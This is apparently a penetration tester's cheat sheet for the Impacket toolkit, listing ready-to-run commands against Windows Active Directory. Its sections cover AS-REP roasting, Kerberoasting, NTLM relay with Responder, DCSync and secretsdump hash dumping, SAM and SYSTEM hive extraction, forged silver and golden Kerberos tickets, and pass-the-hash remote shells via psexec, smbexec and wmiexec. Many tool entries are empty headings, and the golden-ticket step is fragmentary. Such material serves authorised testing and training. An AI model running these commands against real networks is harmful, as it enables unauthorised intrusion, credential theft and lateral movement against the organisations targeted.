Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.

impacket-addcomputer
impacket-atexec
impacket-dcomexec
impacket-dpapi
impacket-esentutl
impacket-exchanger
impacket-findDelegation
impacket-GetADUsers
impacket-getArch
impacket-Get-GPPPassword
impacket-GetNPUsers
impacket-getPac
impacket-getST
impacket-getTGT
impacket-GetUserSPNs
impacket-goldenPac
impacket-karmaSMB
impacket-keylistattack
impacket-kintercept
impacket-lookupsid
impacket-machine_role
impacket-mimikatz
impacket-mqtt_check
impacket-mssqlclient
impacket-mssqlinstance
impacket-netview
impacket-nmapAnswerMachine
impacket-ntfs-read
impacket-ntlmrelayx
impacket-ping
impacket-ping6
impacket-psexec
impacket-raiseChild
impacket-rbcd
impacket-rdp_check
impacket-reg
impacket-registry-read
impacket-rpcdump
impacket-rpcmap
impacket-sambaPipe
impacket-samrdump
impacket-secretsdump
impacket-services
impacket-smbclient
impacket-smbexec
impacket-smbpasswd
impacket-smbrelayx
impacket-smbserver
impacket-sniff
impacket-sniffer
impacket-split
impacket-ticketConverter
impacket-ticketer
impacket-wmiexec
impacket-wmipersist
impacket-wmiquery

Help

List all commands

impacket- [Tab][Tab]

Variable Examples

IP=x.x.x.x
DC_IP=y.y.y.y
HASH=abc...def
USER=myuser
DOMAIN=example.com
PASS=MyPassword
DOMAIN_SID=S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXX # Use enum4linux

impacket-addcomputer

Adds a computer “ATTACK” to the domain with Administrator password “AttackerPC1!”.

impacket-addcomputer ${DOMAIN}/${USER} -dc-ip $DC_IP -hashes $HASH -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'

impacket-atexec

impacket-dcomexec

Provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints. Currently supports MMC20.Application, ShellWindows, and ShellBrowserWindow DCOM objects.

impacket-dcomexec -object MMC20 ${DOMAIN}/${USER}:${PASS}@${IP}

impacket-dpapi

impacket-esentutl

impacket-exchanger

impacket-findDelegation

impacket-GetADUsers

Queries target domain for users data.

impacket-GetADUsers -all ${DOMAIN}/${USER}:${PASS} -dc-ip $DC_IP

impacket-getArch

impacket-Get-GPPPassword

Group Policy Preferences passwords finder and decryptor.

impacket-Get-GPPPassword [[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files)
impacket-Get-GPPPassword ${DOMAIN}/${USER}@dc01.${DOMAIN}

impacket-GetNPUsers

For AS-REP Roasting. Queries target domain for users with ‘Do not require Kerberos preauthentication’ set and export their TGTs for cracking. Harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user’s password, which can then be cracked offline.

The “/” after the domain is important! It will not work without it…

impacket-GetNPUsers -no-pass -dc-ip $DC_IP $DOMAIN/ -usersfile users.txt -outputfile hashes.txt

Seen in a demo.

impacket-GetNPUsers -request ${DOMAIN}/ -usersfile reproastable.txt -format hashcat

Request TGTs for all users

GetNPUsers.py contoso.com/emily:password -request
GetNPUsers.py contoso.com/emily

impacket-getPac

impacket-getST

Given a password, hash or aesKey, it will request a Service Ticket and save it as ccache.

impacket-getST -spn cifs/dc01.${DOMAIN} ${DOMAIN}/attack\$:'AttackerPC1!' -impersonate Administrator -dc-ip $DC_IP

impacket-getTGT

Request a TGT and save it as ccache for given a password, hash or aesKey. That we can be injected directory for access the requested service. Use KRB5CCNAME to pass the ccache file for the requested service. See Overpass the Hash/Pass the Key.

impacket-getTGT -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS}
impacket-getTGT -dc-ip $DC_IP -hashes ${HASH} ${DOMAIN}/${USER}
export KRB5CCNAME=${USER}.ccache
impacket-psexec -dc-ip $DC_IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<machine name>.${DOMAIN}

See HackTricks, If error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great):

sudo ntpdate $DC_IP

impacket-GetUserSPNs

impacket-GetUserSPNs -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS} -outputfile SPNs.txt
impacket-GetUserSPNs -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS} -request -outputfile SPNs.txt
impacket-GetUserSPNs -dc-ip $DC_IP -hashes ${HASH} ${DOMAIN}/${USER} -outputfile SPNs.txt

See Kerberoasting.

impacket-GetUserSPNs -request ${DOMAIN}/${USER} > kerberoasting.txt

impacket-goldenPac

impacket-karmaSMB

impacket-keylistattack

impacket-kintercept

impacket-lookupsid

impacket-machine_role

impacket-mimikatz

impacket-mqtt_check

impacket-mssqlclient

impacket-mssqlinstance

impacket-netview

impacket-nmapAnswerMachine

impacket-ntfs-read

impacket-ntlmrelayx

An NTLM relay attack exploits the NTLM challenge-response mechanism. An attacker intercepts legitimate authentication requests and then forwards them to the server. The client who originally sent the request receives the appropriate challenges, but the attacker intercepts the responses and forwards them to the server, which then authenticates the attacker rather than the person or device that made request.

For every connection received, this module will try to relay that connection to specified target(s) system or the original client.

Start a listener

Use Responder.

Do we need to use the mode with response or can we just use the analyze mode. To test.

sudo -E responder -I eth0 --lm

Help

impacket-ntlmrelayx -h

dclist.txt

“all” will try all protocols instead of only smb.

all://dc1.example.com
all://dc2.example.com

-tf: File that contains targets by hostname or full URL, one per line
-w: Watch the target file for changes and update target list automatically (only valid with -tf)

sudo impacket-ntlmrelayx -tf dclist.txt -w --remove-mic 
sudo impacket-ntlmrelayx -tf dclist.txt -w --remove-mic -c "whoami"

impacket-ping

impacket-ping6

impacket-psexec

Execute processes on remote systems.

impacket-psexec -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS}@${IP}
USER=Administrator
HASH=<LM hash>:<NTLM hash>

impacket-psexec -dc-ip $DC_IP -hashes ${HASH} ${DOMAIN}/${USER}@${IP}

impacket-raiseChild

impacket-rbcd

impacket-rdp_check

impacket-reg

impacket-registry-read

impacket-rpcdump

Dumps the remote RPC enpoints information via epmapper.

Ports: ‘135’, ‘139’, ‘443’, ‘445’, ‘593’

impacket-rpcdump $IP > rpc.txt
impacket-rpcdump -port 135 ${DOMAIN}/${USER}:${PASS}@$IP > rpc.txt

impacket-rpcmap

impacket-sambaPipe

impacket-samrdump

impacket-secretsdump

Performs various techniques to dump secrets from the remote machine without executing any agent there.

impacket-secretsdump ${USER}:${PASS}@$IP -outputfile secretsdump
impacket-secretsdump -just-dc -no-pass ${DC_NAME}\$@${DC_IP} > secretdump.txt
impacket-secretsdump -no-pass -hashes <LMHASH>:<NTHASH> ${DOMAIN}/${USER}@${DC_IP} > secretdump_authenticated.txt

When we have an account with the DCSync rights, we can use Impacket’s secretsdump.py script to Sync the Domain Controller remotely and capture the domain hashes. Run the following command to run the script:

impacket-secretsdump ${DOMAIN}/${USER}:${PASS}@${DC_IP} > secretdump_authenticated.txt

Extract hashes from ntds.dit

  • ntds: location and name of the ntds.dit file
  • system: location and name of the SYSTEM hive
  • hashes lmnhash:nthash: NTLM hash
  • LOCAL: parse files on the local system
  • outputfile: location and name of the output file. Extensions are automatically added based on content extracted
impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

Dump registry and read – for older Windows (like Windows XP)

Dump registry on victim, transfer files to Kali and run impacket-secretdump.

reg.exe save hklm\sam sam.save
reg.exe save hklm\security security.save
reg.exe save hklm\system system.save
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL > secretsdump.txt

impacket-services

impacket-smbclient

Do not specify the domain (like example.com\myusername), just the username.

impacket-smbclient $USER@$IP
shares
use <sharename>

Seen in a demo.

impacket-smbclient ${DOMAIN}/${USER}@dc01.${DOMAIN}

impacket-smbexec

Get a semi-interactive shell.

impacket-smbexec -hashes :${HASH} ${DOMAIN}/${USER}@${IP}

impacket-smbpasswd

impacket-smbrelayx

impacket-smbserver

On Kali

sudo impacket-smbserver myshare /home/kali/share

FIX FOR: You can’t connect to the file share because it’s not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.

sudo impacket-smbserver -smb2support myshare /home/kali/share

On Windows

dir \\<KALI IP>\myshare
copy 20220530051149_BloodHound.zip \\x.x.x.x\myshare\

impacket-sniff

impacket-sniffer

impacket-split

impacket-ticketConverter

Convert tickets between Linux/Windows format. Convert kirbi files (commonly used by mimikatz) into ccache files used by impacket, and vice versa.

TICKET_KIRBY=someticket.kirbi
TICKET_CCACHE=someticket.ccache
impacket-ticketConverter $TICKET_KIRBY $TICKET_CCACHE
impacket-ticketConverter $TICKET_CCACHE $TICKET_KIRBY

impacket-ticketer

NOT TESTED YET

Creates a Kerberos golden/silver tickets based on user options.

-spn: SPN (service/server) of the target service the silver ticket will be generated for. if omitted, golden ticket will be created

Get SPN

Use impacket-GetUserSPNs.

SPN=example/CIFS:445

Generate silver ticket

impacket-ticketer -spn $SPN
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN_SID -domain jurassic.park -spn cifs/labwws02.jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache 
python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass
# To generate the TGS with NTLM
impacket-ticketer -nthash <ntlm_hash> -domain-sid <domain_sid> -domain $DOMAIN -spn $SPN $USER

# To generate the TGS with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

Generate golden ticket

-hashes :${HASH} ${DOMAIN}/${USER}@${IP}

Execute remote commands with any of the following by using the ticket

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

impacket-wmiexec

Executes a semi-interactive shell using Windows Management Instrumentation.

Can be used to upload / download files!

impacket-wmiexec ${USER}:${PASS}@${IP}

Fix for Windows XP: “The version of OLE on the client and server machines does not match.”

impacket-wmiexec -com-version 5.1 ${USER}:${PASS}@${IP}
help
lput /home/kali/share/PowerView.ps1 [destination]
lget proof.txt
put <source file> [destination path]
get <filename>

impacket-wmipersist

impacket-wmiquery

Using tickets with Impacket

In Linux

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following by using the TGT
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

In Windows

Inject ticket with Mimikatz

mimikatz.exe # kerberos::ptt <ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec

.\PsExec.exe -accepteula \\<remote_hostname> cmd